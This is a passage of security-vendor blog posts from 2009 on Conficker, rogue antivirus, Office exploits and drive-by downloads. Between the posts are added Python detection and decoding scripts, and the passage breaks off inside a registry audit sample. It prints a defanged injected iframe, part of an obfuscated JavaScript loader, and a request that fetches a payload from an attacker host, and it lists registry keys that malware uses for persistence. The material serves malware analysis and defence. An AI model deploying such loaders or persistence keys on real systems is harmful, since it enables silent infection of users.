Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributors have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious, and our first take was “Wow, they are fast”. We watched the evolution of the number of Google results that presented malware over the course of April 2. The last we checked, even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

Google Search Results

The search results don’t look so threatening, but if you click on the first few URLs, you’ll find differently. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

Quite a bad site indeed!

Misleading Searches Lead to Porn and Malware!!!

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

Rogue AV Sure Does Look Real!!!

So what about that 1969 Rybovich? What about further curiosity-based Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click to go to a link, does the content look like what you expected, or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed to red flag number three, the fake malware scan. Already you’re on a dangerous path that is not going to show you anything about Madoff’s yacht.

Next Up: Office Exploits Reloaded

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as the Exploit-PPT.k trojan using the 5573 DATs, to be released on the same day.

As with most other document exploits, these PowerPoint files install malicious trojans in the background but display an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

  • fssm32.exe: 428,032 bytes (Muster.c trojan)
  • IEUpd.exe: 45,056 bytes (Muster.c trojan)
  • setup.exe: 131,072 bytes (Muster.c trojan)
  • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
  • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode and hide the applications running on the desktop, such as system monitoring tools that could give the victim any clue to the dodgy installation of trojans.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

Conficker.C Over The Wire

A lot has already been written about Conficker. There have been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of Conficker.C’s behavior.

We set up a small testbed with a machine infected with Conficker.C in a controlled environment, and another Linux box customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: the pre-April 1st phase and the April 1st phase.

During the pre-April 1st phase we observed the following.

Conficker.C gets the current time from some popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website, followed by an HTTP GET request to that IP address. The figure below illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP and TCP scans. The volume of the UDP scans was particularly high, roughly 2-3 UDP queries per second, and seemed to taper off as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports open, a large number of ICMP messages were received: port unreachable, host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the HTTP date check query responses, so that for every website that Conficker.C queries, it gets a response with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only 2 date check sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found patterns in both the requests and responses. These patterns are valid for both the pre-April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristic into our latest Network Security Platform signature set, 5.1.16.15 or 4.1.46.16.

McAfee Network Security Platform (Intrushield) customers can observe the following alerts.

  • WORM: W32/Conficker.C Activity Detected
  • HTTP: Suspicious Time Check Detected

The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)
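The two network traits described in this post, the aggressive UDP peer scanning that mostly bounces back ICMP unreachables and the burst of DNS lookups for generated names once the worm believes it is April 1st, can be turned into simple per-host heuristics. The script below is an added example, not McAfee’s Network Security Platform signature logic; it runs over a constructed packet log (hosts 10.0.0.5 and 10.0.0.7, resolver 10.0.0.1 and the thresholds are all made up for the illustration, loosely following the 2-3 probes per second observed above).

```python
"""Flow-log heuristics for Conficker.C-style network behaviour.

Added example (not McAfee's signatures). Scores each internal host on two
traits: aggressive UDP probing of random peers that is mostly answered with
ICMP unreachables, and a burst of DNS lookups for names that do not resolve.
Packet records and thresholds are constructed for illustration.
"""
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float       # seconds since capture start
    proto: str      # "udp", "tcp", "icmp" or "dns"
    src: str
    dst: str
    info: str = ""  # destination port, ICMP message text, or "qname:rcode"


# Constructed thresholds; tune them against your own baseline traffic.
SCAN_RATE = 2.0       # UDP probes per second
SCAN_DISTINCT = 0.9   # share of probes that go to a never-seen destination
SCAN_UNREACH = 0.5    # share of probes answered by an ICMP unreachable
NXDOMAIN_BURST = 100  # distinct non-resolving names from one host


def udp_scan_stats(pkts, host, window=60.0):
    """Profile `host`'s outbound UDP within `window` seconds of its first probe."""
    probes = [p for p in pkts if p.proto == "udp" and p.src == host]
    if not probes:
        return {"rate": 0.0, "distinct_ratio": 0.0, "unreach_ratio": 0.0}
    t0 = min(p.ts for p in probes)
    probes = [p for p in probes if p.ts - t0 < window]
    span = max(1.0, max(p.ts for p in probes) - t0)
    distinct = len({p.dst for p in probes})
    unreach = sum(1 for p in pkts
                  if p.proto == "icmp" and p.dst == host and "unreachable" in p.info)
    return {"rate": len(probes) / span,
            "distinct_ratio": distinct / len(probes),
            "unreach_ratio": min(1.0, unreach / len(probes))}


def nxdomain_names(pkts, host):
    """Distinct names `host` looked up that came back NXDOMAIN."""
    return {p.info.split(":", 1)[0] for p in pkts
            if p.proto == "dns" and p.src == host and p.info.endswith(":NXDOMAIN")}


def classify(pkts):
    """Map each suspicious host to the traits that fired."""
    verdicts = {}
    for host in sorted({p.src for p in pkts if p.proto in ("udp", "dns")}):
        reasons = []
        s = udp_scan_stats(pkts, host)
        if (s["rate"] >= SCAN_RATE and s["distinct_ratio"] >= SCAN_DISTINCT
                and s["unreach_ratio"] >= SCAN_UNREACH):
            reasons.append("udp-peer-scan")
        if len(nxdomain_names(pkts, host)) >= NXDOMAIN_BURST:
            reasons.append("dga-nxdomain-burst")
        if reasons:
            verdicts[host] = reasons
    return verdicts


def build_sample():
    """Constructed capture: one infected host (10.0.0.5) and one clean host (10.0.0.7)."""
    rng = random.Random(7)
    bad, good, resolver = "10.0.0.5", "10.0.0.7", "10.0.0.1"
    pkts = []
    for i in range(150):  # about 2.5 probes/s to random peers
        dst = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        pkts.append(Pkt(i * 0.4, "udp", bad, dst, str(rng.randint(1024, 65535))))
        if i % 3:         # two of three peers are not there
            pkts.append(Pkt(i * 0.4 + 0.05, "icmp", dst, bad, "port unreachable"))
    for i in range(120):  # generated names that do not exist
        pkts.append(Pkt(60 + i * 0.1, "dns", bad, resolver,
                        f"{rng.randrange(1 << 32):08x}.example:NXDOMAIN"))
    for i in range(20):   # ordinary resolver traffic from a clean host
        pkts.append(Pkt(i * 3.0, "udp", good, resolver, "53"))
        pkts.append(Pkt(i * 3.0 + 0.01, "dns", good, resolver, "www.example.com:NOERROR"))
    return pkts


if __name__ == "__main__":
    for host, why in classify(build_sample()).items():
        print(host, ", ".join(why))
```

The UDP rule deliberately needs all three signals at once: a busy DNS client or a game also sends UDP quickly, but to a handful of destinations that answer, whereas random peer discovery hits fresh addresses that mostly do not exist.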

Conficker Activation On April 1st

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

Message in a Malware

We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on the communication channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the nonfamily friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

 Backdoor-DOQ Voodoo

It’s hardly a love song.

The most common vulnerabilities used by malevolent URLs in China

Every day there are thousands of websites that have been injected with malicious code, and millions of hosts have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, its features are easy to use, and it is free. Multiple buffer overflows in BaoFeng2 Storm allow for the downloading and execution of files. The CVE number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that integrates a powerful MP3 search, web page search, Flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. The CVE number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great many customers. Buffer overflows in Xunlei Web before version 5.6.3.44 allow the execution of arbitrary code. The CVE number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software based on P2P streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a free gaming platform that covers all the related fields and areas of network games. It offers nearly one hundred kinds of games, including card games, casual games, large-scale network games and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module, in the ConnectAndEnterRoom() method, allow for the execution of arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow for the execution of arbitrary code. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is a media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allow for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as HTTP, FTP and BitTorrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

Another Day, Another Rogue Security Program

There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

Another day hunting malware…

Don’t you like it when legit obfuscated JavaScript is mixed with malicious JavaScript?
Also, don’t you like it when the malicious one is linked with several redirections, referrers, exploits and other malware?

So, here is the story…
Once upon a time a user was checking for a service on Google and found one that fit the need…
The site is an innocent (until proven otherwise) website that has existed for some years to advertise a specific type of service.
The site uses all that fancy (and legit) JavaScript to give some special effects to the website.

Indeed, real special effects…because when you get in there, all the magic happens…:)

From the user’s standpoint, he just went to the website, let’s call it specialeffectsservices.domain, and suddenly his machine was owned and the AV started to pop up alerts…

A closer view reveals what happened:
Among all the .js files on the website, besides the regular fancy JavaScript, there was one not so innocent…

The script was obfuscated with the well-known (p,a,c,k,e,d) function.

I managed to deobfuscate it and found the following iframe:
[iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/' style='display:none'></iframe]

If you go to [REMOVED]-atm.net website, you will find the nice message:

H@K3D 8Y J@KE-M1L

If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net

The files[REMOVED].net site also contains a folder called b2b with another obfuscated script (which you are only able to see with the right referrer):

[SCRIPT LANGUAGE="JavaScript"]
function spl(){var
crypted="60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
41!59!32
.
.
.
3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!";var
i,out="",temp="",c=0;l=crypted.length;do{while(crypted.charAt(c)!='!')temp=temp+crypted.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp="";}while(c<=crypted.length-1);document.write(out);}
spl();
[/SCRIPT]

When I was finally able to deobfuscate it, I could see that it led to yet another redirect on the same site, as you can see:

q.open('GET','hXXp://files[REMOVED].net/b2b/load/',0);
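The loader above is nothing more than a list of decimal character codes separated by “!” that the page turns back into a script and feeds to document.write. The decoder below is an added example (not the post author’s tooling): it reproduces the decode loop offline so the second stage can be read without ever executing it, then pulls out the indicators worth recording. The visible prefix of the crypted string is taken from the post as shown; the second-stage text used to build the full sample, and the hxxp://files.example/… URL in it, are constructed.

```python
"""Static decoder for the '!'-separated char-code loader shown in the post.

Added example, not the post's or the malware author's code. The decode loop
mirrors spl() but returns the text instead of calling document.write().
"""
import re

# Visible start of the crypted literal from the post (its middle is elided there).
PAGE_PREFIX = ("60!83!99!114!105!112!116!32!76!97!110!103!117!97!103!101!61!39!74!97!"
               "118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!41!59!32")


def decode_bang_charcodes(crypted):
    """Mirror of the loop: read digits up to each '!', emit that character."""
    out = []
    for token in crypted.split("!"):
        if token == "":            # the trailing '!' leaves an empty token
            continue
        if not token.isdigit():
            raise ValueError(f"unexpected token {token!r}")
        out.append(chr(int(token)))
    return "".join(out)


def crypted_from_script(script_text):
    """Pull the crypted="..." literal out of a (possibly line-wrapped) script."""
    m = re.search(r'crypted\s*=\s*["”]([0-9!\s]+)["”]', script_text)
    if not m:
        raise ValueError("no crypted literal found")
    return re.sub(r"\s+", "", m.group(1))   # drop wrapping whitespace


def extract_indicators(decoded):
    """URLs (plain or hxxp-defanged) and XMLHttpRequest opens in the decoded stage."""
    urls = re.findall(r"""h(?:tt|xx)ps?://[^\s'"<>()]+""", decoded, flags=re.IGNORECASE)
    opens = re.findall(r"""\.open\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]+)['"]""", decoded)
    return {"urls": urls, "xhr": opens}


def encode_bang_charcodes(text):
    """Inverse of the decoder; used here only to build the constructed sample."""
    return "!".join(str(ord(c)) for c in text) + "!"


# Constructed stand-in for the elided second stage (defanged URL, no real host).
SAMPLE_STAGE2 = ("<Script Language='JavaScript'>\r\n"
                 "q.open('GET','hxxp://files.example/b2b/load/',0);\r\n"
                 "</Script>")
SAMPLE_SCRIPT = ('function spl(){var\ncrypted="' + encode_bang_charcodes(SAMPLE_STAGE2)
                 + '";var\ni,out="";}')


if __name__ == "__main__":
    print(repr(decode_bang_charcodes(PAGE_PREFIX)))
    stage2 = decode_bang_charcodes(crypted_from_script(SAMPLE_SCRIPT))
    print(extract_indicators(stage2))
```

Decoding the prefix that is visible in the post already shows the shape of the second stage: an inline script that starts by calling a function named bof(). Keeping the decoder separate from any JavaScript engine is the point; the analyst never needs the page to render.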

The /load folder pushes a PE file to the user’s machine, usually onto C:\ with the name T.exe.

Of course it does not stop there…:)

The T file is a downloader, which then downloads 2 additional files from the same domain plus another one from hansali[REMOVED].com

As additional information, files[REMOVED] is the C&C of the installed malware.

And yes, we detect them all…:)

More Comments Regarding Conficker

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

W32/Conficker: Much Ado About Nothing?

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be only a damp squib.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

Sound Fake? Finding a Malicious Driver

You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

Recently, we noticed that the Lando Trojan uses a different registry key to load its malicious code into Internet Explorer. By dropping a fake sound driver (wdmaud.sys) into the %system32% folder and adding the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2: “%system32%\wdmaud.sys,” the malware author injects malicious code into the iexplore.exe process. When the user launches Internet Explorer, the attacker hijacks Google search.

How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is a component of Microsoft’s WDM driver or WINMM WDM Audio Compatibility driver. You’ll find it in the %system32%\drivers\ folder. It is about 84KB and includes complete version information.

Meanwhile the malicious wdmaud.sys is located in the %system32% folder itself, not in its drivers\ subfolder. It is only about 22KB and has no version information.

By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

Should I Care About server.exe?

Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, it drops the file server.exe into the user’s system directory:

 server.exe

Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

Breaking the Codec…

I ran across a new twist on the by-now well known FakeAlert series. Just in case you have been lucky enough not to have dealt with this malware, it goes roughly like this:

You get an email from what looks to be a legitimate source, or visit a legitimate looking website that is offering the latest must-have application or upgrade. “This thing looks cool”, you think as you happily ignore your IT security friend’s advice against following unsolicited or potentially unsafe links. “Someone must really like me to be sharing this with me”.

So you continue to download the ‘treasure’. Then when you try to install it, it pops up an error - something about being corrupt and the installation cannot proceed. Seconds later, you find that some ‘nice’ company has put an antivirus scanner on your computer and begins to scan it for you. You find out that you are loaded with all kinds of nasty stuff and because nothing in life is free, you have to pony up the money to have your computer cleaned.

Problem is, you may not have had these infections in real life. Except, of course, the one you downloaded and installed yourself. This is but one scenario of the fake antivirus scourge.

So the new twist is that your favorite audio or video application may now assist in this nefarious sale. When you install this application, you will actually see things ‘happening’. You won’t be happily working away listening to the latest pop sensation when this gets loaded. The malware will actually stop your multimedia application and drop your volume to zero. It will likewise prevent you from attempting to restart it. You will start to get more and more ominous warnings about your audio and video codecs being corrupted until your entire desktop background is replaced with a giant ‘Your system is melting down and the world is coming to an end - just click here and we will help you fix it’ message (author’s note: it’s not that dramatic, but you get the idea). Of course to ‘fix’ it, it will cost you.

That said, be careful of this scam. We all would like to whistle while we work, but this may have you singing a different tune (sorry, couldn’t resist the sappy line).

More technical information is available here:
FakeAlert-MCodec

McAfee Debuts ‘Combating Threats’ Series

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Democrats.org Cans the Spam

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

Safe Mode: A Misnomer

Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

Safe Mode not safe

The services and drivers that load in Safe Mode are listed under the following registry key(s):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.

Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.
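Both the Lando trick from “Sound Fake” above (a Drivers32 alias pointing at a .sys file in %system32%) and the Safe Mode persistence described here leave traces in a registry export, so they can be audited from a `reg export` file taken off the machine. The script below is an added example, not McAfee’s detection logic: it parses the .reg format, flags Drivers32 values that do not look like the bare user-mode driver names Windows normally keeps there, and diffs the SafeBoot key lists against a baseline export from a known-clean build. The two exports, the `evilsvc` entry and the “no .sys, no explicit path” rule for Drivers32 are constructed heuristics for the illustration, not a Microsoft specification.

```python
"""Autostart-registry audit for the Drivers32 and SafeBoot tricks.

Added example (not McAfee's code). Reads Regedit 5.00 exports, flags
Drivers32 entries that point at a kernel .sys or an explicit path where a
bare multimedia driver name (wdmaud.drv, iccvid.dll, ...) is expected, and
reports SafeBoot subkeys that a clean baseline does not have.
"""

DRIVERS32 = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
SAFEBOOT = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal",
            r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network")


def parse_reg(text):
    """Minimal .reg parser: {key path: {value name: data as string}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(default)" if name == "@" else name.strip('"')
        if data.startswith('"') and data.endswith('"'):
            # .reg files escape backslashes and quotes inside string data
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = data
    return keys


def suspicious_drivers32(reg):
    """Drivers32 values that are not plain .drv/.dll/.acm style names (heuristic)."""
    findings = []
    for name, data in reg.get(DRIVERS32, {}).items():
        reasons = []
        if data.lower().endswith(".sys"):
            reasons.append("kernel .sys where a user-mode multimedia driver is expected")
        if "\\" in data or "/" in data:
            reasons.append("explicit path instead of a bare system32 filename")
        if reasons:
            findings.append((name, data, reasons))
    return findings


def safeboot_additions(baseline_reg, current_reg):
    """SafeBoot subkeys present now but absent from the clean baseline export."""
    def entries(reg):
        return {k for k in reg if any(k.startswith(p + "\\") for p in SAFEBOOT)}
    return entries(current_reg) - entries(baseline_reg)


# Constructed exports: a clean baseline and the same machine after infection.
BASELINE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"wave"="wdmaud.drv"
"midi"="wdmaud.drv"
"aux"="wdmaud.drv"
"vidc.cvid"="iccvid.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"
"""

INFECTED_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"wave"="wdmaud.drv"
"midi"="wdmaud.drv"
"aux"="wdmaud.drv"
"vidc.cvid"="iccvid.dll"
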